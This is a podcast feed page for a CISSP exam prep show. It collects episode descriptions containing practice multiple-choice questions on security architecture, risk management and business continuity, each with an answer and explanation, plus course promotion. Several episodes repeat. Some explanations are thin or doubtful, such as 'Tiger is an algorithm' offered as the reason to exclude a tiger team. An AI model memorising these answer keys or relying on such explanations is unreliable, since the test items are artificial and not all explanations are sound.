Reduce Cyber Risk Podcast

Subscribe: iTunes | Goggle Play | Stitcher Radio | RSS Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  Shon will provide CISSP training and study around the tools you need to better understand what you need to know to be better prepared for the CISSP Exam Questions.  His knowledge will provide the skills needed to pass the CISSP Exam. BTW - Get access to all my Free Content and CISSP Training Courses here at:  https://shongerber.com/   Available Courses:  CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o   CISSP Exam Questions Question:  165 Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection. Which of the following best describes an item the software development team needs to address to ensure that drivers cannot be loaded in an unauthorized manner? A. Improved security kernel processes B. Improved security perimeter processes C. Improved application programming interface processes D. Improved garbage collection processes If device drivers can be loaded improperly, then either the access control rules outlined within the reference monitor need to be improved upon or the current rules need to be better enforced through the security kernel processes. Only authorized subjects should be able to install sensitive software components that run within ring 0 of a system. https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question:  166 Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection. Which of the following best describes Steve’s confusion? A. Certification must happen first before the evaluation process can begin. B. Accreditation is the acceptance from management, which must take place before the evaluation process. C. Evaluation, certification, and accreditation are carried out by different groups with different purposes. D. Evaluation requirements include certification and accreditation components. Evaluation, certification, and accreditation are carried out by different groups with different purposes. Evaluations are carried out by qualified third parties who use specific evaluation criteria (Orange Book, ITSEC, Common Criteria) to assign an assurance rating to a tested product. A certification process is a technical review commonly carried out internally to an organization, and accreditation is management’s formal acceptance that is carried out after the certification process. A system can be certified internally by a company and not pass an evaluation testing process because they are completely different things. https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question:  167 Sarah’s team must build a new operating system for her company’s internal functionality requirements. The system must be able to process data at different classifications levels and allow users of different clearances to be able to interact with only the data that maps to their profile. She is told that the system must provide data hiding, and her boss suggests that her team implement a hybrid microkernel design. Sarah knows that the resulting system must be able to achieve a rating of EAL 6 once it goes through the Common Criteria evaluation process. Which of the following best describes one of the system requirements outlined in this scenario and how it should be implemented? A. Data hiding should be implemented through memory deallocation. B. Data hiding should be implemented through properly developed interfaces. C. Data hiding should be implemented through a monolithic architecture. D. Data hiding should be implemented through multiprogramming. Data hiding means that certain functionality and/or data is “hidden,” or not available to specific processes. For processes to be able to interact with other processes and system services, they need to be developed with the necessary interfaces that restrict communication flows between processes. Data hiding is a protection mechanism that segregates trusted and untrusted processes from each other through the use of strict software interface design. https://www.brainscape.com/subjects/cissp-domains Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS: ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Subscribe: iTunes | Goggle Play | Stitcher Radio | RSS Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  Shon will provide CISSP training and study around the tools you need to better understand what you need to know to be better prepared for the CISSP Exam Questions.  His knowledge will provide the skills needed to pass the CISSP Exam. BTW - Get access to all my Free Content and CISSP Training Courses here at:  https://shongerber.com/   Available Courses:  CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o  

Subscribe: iTunes | Goggle Play | Stitcher Radio | RSS Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  Shon will provide CISSP study and training for passing the CISSP Exam the first time BTW - Get access to all my Free Content and CISSP Training Courses here at:  https://shongerber.com/ Available Courses:  CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o   CISSP Exam Questions Question:  168 Sarah’s team must build a new operating system for her company’s internal functionality requirements. The system must be able to process data at different classifications levels and allow users of different clearances to be able to interact with only the data that maps to their profile. She is told that the system must provide data hiding, and her boss suggests that her team implement a hybrid microkernel design. Sarah knows that the resulting system must be able to achieve a rating of EAL 6 once it goes through the Common Criteria evaluation process. Which of the following is a characteristic that this new system will need to implement? A. Multiprogramming B. Simple integrity axiom C. Mandatory access control D. Formal verification   Since the new system must achieve a rating of EAL 6, it must implement mandatory access control capabilities. This is an access control model that allows users with different clearances to be able to interact with a system that processes data of different classification levels in a secure manner. The rating of EAL 6 requires semiformally verified design and testing, whereas EAL 7 requires verified design and testing. https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question:  169 Sarah’s team must build a new operating system for her company’s internal functionality requirements. The system must be able to process data at different classifications levels and allow users of different clearances to be able to interact with only the data that maps to their profile. She is told that the system must provide data hiding, and her boss suggests that her team implement a hybrid microkernel design. Sarah knows that the resulting system must be able to achieve a rating of EAL 6 once it goes through the Common Criteria evaluation process. Which of the following reasons best describes her boss’s suggestion on the kernel design of the new system? A. Hardware layer abstraction for portability capability B. Layered functionality structure C. Reduced mode transition requirements D. Central location of all critical operating system processes A hybrid microkernel architecture means that all kernel processes work within kernel mode, which reduces the amount of mode transitions. The reduction of mode transitions reduces performance issues because the CPU does not have to change from user mode to kernel mode as many times during its operation. https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question:  170 Sarah’s team must build a new operating system for her company’s internal functionality requirements. The system must be able to process data at different classifications levels and allow users of different clearances to be able to interact with only the data that maps to their profile. She is told that the system must provide data hiding, and her boss suggests that her team implement a hybrid microkernel design. Sarah knows that the resulting system must be able to achieve a rating of EAL 6 once it goes through the Common Criteria evaluation process. Which of the following is a required characteristic of the system Sarah’s team must build? A. Multilevel security B. Dedicated mode capability C. Simple security rule D. Clark-Wilson constructs A multilevel security system allows for data at different classification levels to be processed and allows users with different clearance levels to interact with the system securely. https://www.brainscape.com/subjects/cissp-domains Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS: ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources Online Article https://www.cio.com/article/2381021/best-practices-how-to-create-an-effective-business-continuity-plan.html

Subscribe: iTunes | Goggle Play | Stitcher Radio | RSS Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  Shon will provide CISSP training and study around the tools you need to better understand what you need to know to be better prepared for the CISSP Exam Questions.  His knowledge will provide the skills needed to pass the CISSP Exam. BTW - Get access to all my Free Content and CISSP Training Courses here at:  https://shongerber.com/   Available Courses:  CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o   CISSP Exam Questions Question:  165 Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection. Which of the following best describes an item the software development team needs to address to ensure that drivers cannot be loaded in an unauthorized manner? A. Improved security kernel processes B. Improved security perimeter processes C. Improved application programming interface processes D. Improved garbage collection processes If device drivers can be loaded improperly, then either the access control rules outlined within the reference monitor need to be improved upon or the current rules need to be better enforced through the security kernel processes. Only authorized subjects should be able to install sensitive software components that run within ring 0 of a system. https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question:  166 Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection. Which of the following best describes Steve’s confusion? A. Certification must happen first before the evaluation process can begin. B. Accreditation is the acceptance from management, which must take place before the evaluation process. C. Evaluation, certification, and accreditation are carried out by different groups with different purposes. D. Evaluation requirements include certification and accreditation components. Evaluation, certification, and accreditation are carried out by different groups with different purposes. Evaluations are carried out by qualified third parties who use specific evaluation criteria (Orange Book, ITSEC, Common Criteria) to assign an assurance rating to a tested product. A certification process is a technical review commonly carried out internally to an organization, and accreditation is management’s formal acceptance that is carried out after the certification process. A system can be certified internally by a company and not pass an evaluation testing process because they are completely different things. https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question:  167 Sarah’s team must build a new operating system for her company’s internal functionality requirements. The system must be able to process data at different classifications levels and allow users of different clearances to be able to interact with only the data that maps to their profile. She is told that the system must provide data hiding, and her boss suggests that her team implement a hybrid microkernel design. Sarah knows that the resulting system must be able to achieve a rating of EAL 6 once it goes through the Common Criteria evaluation process. Which of the following best describes one of the system requirements outlined in this scenario and how it should be implemented? A. Data hiding should be implemented through memory deallocation. B. Data hiding should be implemented through properly developed interfaces. C. Data hiding should be implemented through a monolithic architecture. D. Data hiding should be implemented through multiprogramming. Data hiding means that certain functionality and/or data is “hidden,” or not available to specific processes. For processes to be able to interact with other processes and system services, they need to be developed with the necessary interfaces that restrict communication flows between processes. Data hiding is a protection mechanism that segregates trusted and untrusted processes from each other through the use of strict software interface design. https://www.brainscape.com/subjects/cissp-domains Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS: ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources

Subscribe: iTunes | Goggle Play | Stitcher Radio | RSS Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.  Shon will provide CISSP training and study around the tools you need to better understand what you need to know to be better prepared for the CISSP Exam Questions.  His knowledge will provide the skills needed to pass the CISSP Exam. BTW - Get access to all my Free Content and CISSP Training Courses here at:  https://shongerber.com/ Available Courses:  CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o CISSP Exam Questions Question:  162 John has been told that one of the applications installed on a web server within the DMZ accepts any length of information that a customer using a web browser inputs into the form the web server provides to collect new customer data. Which of the following describes an issue that John should be aware of pertaining to this type of issue? A. Application is written in the C programming language. B. Application is not carrying out enforcement of the trusted computing base. C. Application is running in ring 3 of a ring-based architecture. D. Application is not interacting with the memory manager properly.   The C language is susceptible to buffer overflow attacks because it allows for direct pointer manipulations to take place. Specific commands can provide access to low-level memory addresses without carrying out bounds checking.   https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question:  163 Steve has found out that the software product that his team submitted for evaluation did not achieve the actual rating they were hoping for. He was confused about this issue since the software passed the necessary certification and accreditation processes before being deployed. Steve was told that the system allows for unauthorized device drivers to be loaded and that there was a key sequence that could be used to bypass the software access control protection mechanisms. Some feedback Steve received from the product testers is that it should implement address space layout randomization and data execution protection. A. Non-protected ROM sections B. Vulnerabilities that allowed malicious code to execute in protected memory sections C. Lack of a predefined and implemented trusted computing base D. Lack of a predefined and implemented security kernel   If testers suggested to the team that address space layout randomization and data execution protection should be integrated, this is most likely because the system allows for malicious code to easily execute in memory sections that would be dangerous to the system. These are both memory protection approaches. https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Question:  156 If a security mechanism offers availability, then it offers a high level of assurance that authorized subjects can _________ the data, objects, and resources. A) Control B) Audit C) Access D) Repudiate   Access   Accessibility of data, objects, and resources is the goal of availability. If a security mechanism offers availability, then it is highly likely that the data, objects, and resources are accessible to authorized subjects.   https://www.brainscape.com/subjects/cissp-domains ------------------------------------ Want to find Shon elsewhere on the internet? LinkedIn – www.linkedin.com/in/shongerber Facebook - https://www.facebook.com/CyberRiskReduced/ LINKS: ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources  

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    Shon will provide CISSP study and training for Domain 4 (Communication and Network Security) of the CISSP Exam.  His knowledge will provide the skills needed to pass the CISSP.  BTW - Get access to all my Free Content and CISSP Training Courses here at:  https://shongerber.com/   Available Courses:    CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB  CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o  CISSP Exam Questions  Question:  159   Vulnerabilities and risks are evaluated based on their threats against which of the following?  A) One or more of the CIA Triad principles  B) Data usefulness  C) Due care  D) Extent of liability  One or more of the CIA Triad principles  Vulnerabilities and risks are evaluated based on their threats against one or more of the CIA Triad principles.  https://www.brainscape.com/subjects/cissp-domains  ------------------------------------  Question:  160  While performing a risk analysis, you identify a threat of fire and a vulnerability because there are no fire extinguishers. Based on this information, which of the following is a possible risk?  A) Virus infection  B) Damage to equipment  C) System malfunction  D) Unauthorized access to confidential information  Damage to equipment    The threat of a fire and the vulnerability of a lack of fire extinguishers lead to the risk of damage to equipment. https://www.brainscape.com/subjects/cissp-domains  ------------------------------------  Question:  161  What process or event is typically hosted by an organization and is targeted to groups of employees with similar job functions?  A) Education  B) Awareness  C) Training  D) Termination  Training  Training is teaching employees to perform their work tasks and to comply with the security policy. Training is typically hosted by an organization and is targeted to groups of employees with similar job functions.  https://www.brainscape.com/subjects/cissp-domains Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/  LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources  Online Article  https://www.cio.com/article/2381021/best-practices-how-to-create-an-effective-business-continuity-plan.html 

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    Shon will provide CISSP training and study around the tools you need to better understand what you need to know to be better prepared for the CISSP Exam Questions.  His knowledge will provide the skills needed to pass the CISSP Exam.   BTW - Get access to all my Free Content and CISSP Training Courses here at:  https://shongerber.com/   Available Courses:    CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB  CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o  CISSP Exam Questions  Question:  156  If a security mechanism offers availability, then it offers a high level of assurance that authorized subjects can _________ the data, objects, and resources.  A) Control  B) Audit  C) Access  D) Repudiate    Access    Accessibility of data, objects, and resources is the goal of availability. If a security mechanism offers availability, then it is highly likely that the data, objects, and resources are accessible to authorized subjects.  https://www.brainscape.com/subjects/cissp-domains  ------------------------------------  Question:  157  All but which of the following items require awareness for all individuals affected?  A) Restricting personal email  B) Recording phone conversations  C) Gathering information about surfing habits  D) The backup mechanism used to retain email messages    The backup mechanism used to retain email messages    Users should be aware that email messages are retained, but the backup mechanism used to perform this operation does not need to be disclosed to them.  https://www.brainscape.com/subjects/cissp-domains  ------------------------------------  Question:  158  Which of the following statements is not true?  A) IT security can provide protection only against logical or technical attacks.  B) The process by which the goals of risk management are achieved is known as risk analysis.  C) Risks to an IT infrastructure are all computer based.  D) An asset is anything used in a business process or task.    Risks to an IT infrastructure are all computer based.    Risks to an IT infrastructure are not all computer based. In fact, many risks come from noncomputer sources. It is important to consider all possible risks when performing risk evaluation for an organization. Failing to properly evaluate and respond to all forms of risk, a company remains vulnerable.  https://www.brainscape.com/subjects/cissp-domains    Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/  LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources 

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    BTW - Get access to all my Free Content and CISSP Training Courses here at:  https://shongerber.com/   Available Courses:    CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB  CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o  CISSP Exam Questions  Question:  153   Which commercial business/private sector data classification is used to control information about individuals within an organization?  A) Confidential  B) Private  C) Sensitive  D) Proprietary    Private    The commercial business/private sector data classification of private is used to protect information about individuals.    https://www.brainscape.com/subjects/cissp-domains  ------------------------------------     Question:  154  Which of the following is not an element of the risk analysis process?  A) Analyzing an environment for risks  B) Creating a cost/benefit report for safeguards to present to upper management  C) Selecting appropriate safeguards and implementing them  D) Evaluating each threat event as to its likelihood of occurring and cost of the resulting damage    Selecting appropriate safeguards and implementing them  Risk analysis includes analyzing an environment for risks, evaluating each threat event as to its likelihood of occurring and the cost of the damage it would cause, assessing the cost of various countermeasures for each risk, and creating a cost/benefit report for safeguards to present to upper management. Selecting safeguards is a task of upper management based on the results of risk analysis. It is a task that falls under risk management, but it is not part of the risk analysis process.  https://www.brainscape.com/subjects/cissp-domains  ------------------------------------     Question:  155  Which of the following is not a defense against collusion?  A) Separation of duties  B) Restricted job responsibilities  C) Group user accounts  D) Job rotation    Group user accounts    Group user accounts allow for multiple people to log in under a single user account. This allows collusion because it prevents individual accountability.  https://www.brainscape.com/subjects/cissp-domains    Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/     LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources 

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    Shon will provide CISSP study and training for Domain 3 (Engineering Secure Design) of the CISSP Exam.  His knowledge will provide the skills needed to pass the CISSP. BTW - Get access to all my Free Content and CISSP Training Courses here at:  https://shongerber.com/   Available Courses:    CISSP Training Course - https://www.shongerber.com/offers/zYsL6MCB  CISO Training Course - https://www.shongerber.com/offers/zd2RbL6o  CISSP Exam Questions  Question:  150   How is the value of a safeguard to a company calculated?  A) ALE before safeguard - ALE after implementing the safeguard - annual cost of safeguard  B) ALE before safeguard * ARO of safeguard  C) ALE after implementing safeguard - annual cost of safeguard - controls gap  D) Total risk - controls gap    [A] ALE before safeguard - ALE after implementing the safeguard - annual cost of safeguard  The value of a safeguard to an organization is calculated by ALE before safeguard - ALE after implementing the safeguard - annual cost of safeguard [(ALE1 -- ALE2) - ACS].  https://www.brainscape.com/subjects/cissp-domains  ------------------------------------  Question:  151  What is the primary objective of data classification schemes?  A) To control access to objects for authorized subjects  B) To formalize and stratify the process of securing data based on assigned labels of importance and sensitivity  C) To establish a transaction trail for auditing accountability  D) To manipulate access controls to provide for the most efficient means to grant or restrict functionality  [B] To formalize and stratify the process of securing data based on assigned labels of importance and sensitivity  The primary objective of data classification schemes is to formalize and stratify the process of securing data based on assigned labels of importance and sensitivity.  https://www.brainscape.com/subjects/cissp-domains  ------------------------------------  Question:  152  What is the primary goal of change management?  A) Maintaining documentation  B) Keeping users informed of changes  C) Allowing rollback of failed changes  D) Preventing security compromises    Preventing security compromises  The prevention of security compromises is the primary goal of change management.  https://www.brainscape.com/subjects/cissp-domains  Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/    LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources 

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    In this episode, Shon will talk about the following items that are included within Domain 2 (Asset Security) of the CISSP Exam.  BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions  Question:  144  To get proper management support and approval of the plan, a business case must be made. Which of the following is least important to this business case?  A. Regulatory and legal requirements  B. Company vulnerabilities to disasters and disruptions  C. How other companies are dealing with these issues  D. The impact the company can endure if a disaster hits  C. The other three answers are key components when building a business case. Although it is a good idea to investigate and learn about how other companies are dealing with similar issues, it is the least important of the four items listed.  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Question:  145  Which of the following describes a parallel test?  A. It is performed to ensure that operations performed at the alternate site also give the same results as at the primary site.  B. All departments receive a copy of the disaster recovery plan and walk through it.  C. Representatives from each department come together and go through the test collectively.  D. Normal operations are shut down.  A. In a parallel test, some systems are run at the alternate site, and the results are compared with how processing takes place at the primary site. This is to ensure that the systems work in that area and productivity is not affected. This also extends the previous test and allows the team to walk through the steps of setting up and configuring systems at the offsite facility.  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Question:  146  Which of the following describes a structured walk-through test?  A. It is performed to ensure that critical systems will run at the alternate site.  B. All departments receive a copy of the disaster recovery plan and walk through it.  C. Representatives from each department come together and review the steps of the test collectively without actually performing those steps.  D. Normal operations are shut down.  C. During a structured walk-through test, functional representatives review the plan to ensure its accuracy and that it correctly and accurately reflects the company’s recovery strategy.  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  Question:  147  When is the emergency actually over for a company?  A. When all people are safe and accounted for  B. When all operations and people are moved back into the  primary site  C. When operations are safely moved to the offsite facility  D. When a civil official declares that all is safe  B. The emergency is not actually over until the company moves back into its primary site. The company is still vulnerable and at risk while it is operating in an altered or crippled state. This state of vulnerability is not over until the company is operating in the way it was prior to the disaster. Of course, this may mean that the primary site has to be totally rebuilt if it was destroyed  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/  LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources 

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    In this episode, Shon will talk about the following items that are included within Domain 2 (Asset Security) of the CISSP Exam.  BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions  Question:  141  Who has the final approval of the business continuity plan?  A. The planning committee  B. Each representative of each department  C. Management  D. External authority  C. Management really has the final approval over everything within a company, including these plans.  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Question:  142  What is the most crucial requirement in developing a business continuity plan?  A. Business impact analysis  B. Implementation, testing, and following through  C. Participation from each and every department  D. Management support  D. Management’s support is the first thing to obtain before putting any real effort into developing these plans. Without management’s support, the effort will not receive the necessary attention, resources, funds, or enforcement.  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Question:  143  During development, testing, and maintenance of the continuity plan, a high degree of interaction and communications is crucial to the process. Why?  A. This is a regulatory requirement of the process.  B. The more people who talk about it and are involved, the more awareness will increase.  C. This is not crucial to the plan and should not be interactive because it will most likely affect operations.  D. Management will more likely support it.  B. Communication not only spreads awareness of these plans and their contents, but also allows more people to discuss the possible threats and solutions, which may lead to ideas that the original team did not consider.  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/  LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources 

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    In this episode, Shon will talk about the following items that are included within Domain 2 (Asset Security) of the CISSP Exam.  BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions  Question:  138  Which of the following is something that should be required of an offsite backup facility that stores backed-up media for companies?  A. The facility should be within 10 to 15 minutes of the original facility to ensure easy access.  B. The facility should contain all necessary PCs and servers and should have raised flooring.  C. The facility should be protected by an armed guard.  D. The facility should protect against unauthorized access and entry. D. This question addresses a facility that is used to store backed-up data; it is not talking about an offsite facility used for disaster recovery purposes. The facility should not be only 10 to 15 minutes away, because some types of disasters could destroy both the company’s main facility and this facility if they are that close together, in which case the company would lose all of its information. The facility should have the same security standards as the company’s security, including protection against unauthorized access.  https://www.brainscape.com/flashcards/cissp-chapter-8-business-continuity-and-d-1538409/packs/2943708  ------------------------------------  Question:  139  Which item will a business impact analysis not identify?  A. Whether the company is best suited for a parallel or full-interrupt test  B. What areas would suffer the greatest operational and financial loss in the event of a particular disaster or disruption  C. What systems are critical for the company and must be highly protected  D. What amount of outage time a company can endure before it is permanently crippled  A. All the other answers address the main components of a business impact analysis. Determining the best type of exercise or drill to carry out is not covered under this type of analysis  https://www.brainscape.com/flashcards/cissp-chapter-8-business-continuity-and-d-1538409/packs/2943708  ------------------------------------  Question:  140  Which areas of a company are recovery plans recommended for?  A. The most important operational and financial areas  B. The areas that house the critical systems  C. All areas  D. The areas that the company cannot survive without  C. It is best if every department within the company has its own contingency plan and procedures in place. These individual plans would “roll up” into the overall enterprise BCP.  https://www.brainscape.com/flashcards/cissp-chapter-8-business-continuity-and-d-1538409/packs/2943708  ------------------------------------  Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/     LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources 

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    In this episode, Shon will talk about the following items that are included within Domain 1 (Security and Risk Management) of the CISSP Exam.  BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions  Question:  135  Which of the following contains references to expected business continuity planning (BCP) practices that organizations must implement  A. ISO 17799:2008, Section 1  B. ISO 27005:2008, Section 8  C. ISO 27002:2005, Section 10  D. ISO 27001:2005, Annex A  Answer: D  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Question:  136  What process identifies the business continuity requirements for the organization's assets?  A. risk analysis  B. business impact analysis  C. threat analysis  D. asset classification  Answer: B  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Question:  137  A contingency plans should be written to  A. address all possible risk scenarios  B. address all likely risk scenarios  C. remediate all vulnerabilities  D. recover all operations  Answer: B  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/  LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources 

Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career.  Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.    In this episode, Shon will talk about the following items that are included within Domain 1 (Security and Risk Management) of the CISSP Exam.  BTW - Get access to all my CISSP Training Courses here at:  https://shongerber.com/  CISSP Exam Questions  Question:  132  Which of the following is less likely to accompany a contingency plan, either within the plan itself or in the form of an appendix?    A. Contact information for all personnel   B. Vendor contract information, including offsite storage and alternate site   C. Equipment ad system requirements lists of hardware, software, firmware, and other resources required to support system operations   D. The Business Impact Analysis  Answer: D Explanation: You use the BIA as a guideline to create the contingency plan.  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Question:  133  The first step in contingency planning is to perform:  A. A hardware backup  B. A data backup  C. An operating system software backup  D. An application software backup  Answer: B  https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------  Question:  134  Which of the following teams should not be included in an organization’s contingency plan?  A. Damage assessment team  B. Hardware salvage team  C. Tiger team  D. Legal affairs team  Answer: C  Explanation: Tiger is an algorithm Excerpt is from CISSP / Shon Harris / 5th edition. https://www.brainscape.com/flashcards/business-continuity-planning-4303634/packs/6456925  ------------------------------------ Want to find Shon elsewhere on the internet?  LinkedIn – www.linkedin.com/in/shongerber  Facebook - https://www.facebook.com/CyberRiskReduced/  LINKS:   ISC2 Training Study Guide  https://www.isc2.org/Training/Self-Study-Resources 

